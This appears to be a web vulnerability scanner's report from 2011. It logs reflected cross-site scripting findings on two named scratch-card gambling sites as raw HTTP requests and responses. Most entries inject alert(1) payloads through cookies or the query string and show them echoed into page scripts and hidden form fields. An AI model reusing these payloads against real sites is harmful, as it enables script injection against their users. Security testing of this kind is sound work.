HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:16:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM51939" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37529 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM51939"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FMa1ace"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 40941 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMa1ace"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc84ee" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 40941 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc84ee"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FM2f3ae"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34423 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM2f3ae"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb7b33" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34424 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb7b33"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:19:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FM4ebe8"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 97835 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM4ebe8"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM25b68" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 97835 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM25b68"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /help.aspx |
GET /help.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:18:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com Set-Cookie: BO=FM7f790"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM7f790"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://home.okscratc |
Path: | /help.aspx |
GET /help.aspx HTTP/1.1 Host: home.okscratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:17:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMaf511" Set-Cookie: BO=FM; domain=okscratchcards.com Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com Set-Cookie: CountryCode=US; domain=okscratchcards.com Set-Cookie: CSITemp=20; domain=okscratchcards.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35435 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMaf511"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://okscratchcards.com |
Path: | / |
GET /?70343'-alert(1)- Host: okscratchcards.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Date: Mon, 16 May 2011 11:40:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.okscratchcards Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12560 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... ; var cookie_id=getCookie("CSI window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/HelpDepositM |
GET /images/HelpDepositM Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137e45f0"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137e45f0%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/HelpDepositM |
GET /images/HelpDepositM Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137e4f61--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137e4f61%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137e4f61--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/HelpDepositM |
GET /images/HelpDepositM Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013748d54'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:30 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013748d54%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/InviteFriend.asp |
GET /images/InviteFriend.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301377b048'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301377b048%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/InviteFriend.asp |
GET /images/InviteFriend.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137ad971--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137ad971%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137ad971--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/InviteFriend.asp |
GET /images/InviteFriend.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137d5f1e"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137d5f1e%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/Responsible.asp |
GET /images/Responsible.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013738b11"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013738b11%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/Responsible.asp |
GET /images/Responsible.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137d5a37--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:30 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137d5a37%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137d5a37--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/Responsible.asp |
GET /images/Responsible.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013739fde'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013739fde%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/SecurityAndP |
GET /images/SecurityAndP Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301377b916--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=1301377b916%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301377b916--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/SecurityAndP |
GET /images/SecurityAndP Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301378c7a4'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301378c7a4%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/SecurityAndP |
GET /images/SecurityAndP Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013759ace"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013759ace%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/aboutus.asp |
GET /images/aboutus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137dcc5b'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19396 Content-Type: text/html Set-Cookie: ARC=130137dcc5b%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/aboutus.asp |
GET /images/aboutus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374d39c--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=1301374d39c%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301374d39c--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/aboutus.asp |
GET /images/aboutus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301372596a"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301372596a%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/affiliates.asp |
GET /images/affiliates.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f636d--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137f636d%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137f636d--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/affiliates.asp |
GET /images/affiliates.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013746fe5'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013746fe5%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/affiliates.asp |
GET /images/affiliates.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301373fa3b"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19396 Content-Type: text/html Set-Cookie: ARC=1301373fa3b%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/bg.jpg |
GET /images/bg.jpg HTTP/1.1 Host: primescratchcards.com Proxy-Connection: keep-alive Referer: http://www.primescra User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pscref=; plstat=0; ARC=1301372c354'%3balert(1)/ |
